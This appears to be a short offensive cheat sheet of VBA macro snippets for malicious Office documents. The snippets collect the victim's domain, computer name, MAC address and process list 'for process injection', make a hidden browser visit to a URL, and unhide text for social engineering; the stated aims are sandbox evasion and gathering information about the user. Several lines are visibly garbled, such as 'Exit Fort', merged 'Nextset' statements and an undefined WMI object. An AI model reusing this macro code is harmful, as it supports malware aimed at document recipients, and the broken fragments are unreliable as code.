This is how we will extract information with Macros. These can be used to evade sandboxes, or to just gather information about the user.
Extracting Domain/Computer name.
Set wshNetwork = CreateObject("Wscript.Network")
strUserDomain = wshNetwork.UserDomain
strCompName = wshNetwork.computername
Extracting MAC/IP
set cItems = objWMIService.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE IPENabled = True")
For Each oItem In cItems
If Not IsNull(oItem.IPAddress) Then myMacAddress = oItem.macAddress
Exit Fort
Nextset objProcessSet = objWMIService.ExecQuery("Select Name, ProcessID FROM Win32_Process")
For Each Process In objProcessSet
ProcessStr = ProcessStr & Process.Properties_("Name").Value & ":" & Process.Properties_("ProcessId").Value & "|"Next
Visit URL
Dim objIE As Object
Set objIE = CreateObject("InternetExplorer.Application")
With objIE
.Visible = False
.Navigate "https://www.silentbreaksecurity.com"
Do While .ReadyState <> 4: DoEvents: Loop
.Quit
End With
Unhides all text(for social engineering purposes)
Selection.WholeStory
With Selection.Font
.Hidden = False
End With
Get a Process List(For Process Injection)
Dim Service, List As Object
Set Service = GetObject("winmgmts:\\.\root\cimv2")Set List = Service.ExecQuery ("SELECT * FROM Win32_Process")Dim result As String
Dim Process As Object
For Each Process In List
If Len(Process.ExecutablePath) > 0 Then
result = result & Process.ExecutablePath & vbNewLine
ElseIf Len(Process.name) > 0 Then
result = result & Process.name & vbNewLine
End If
Next
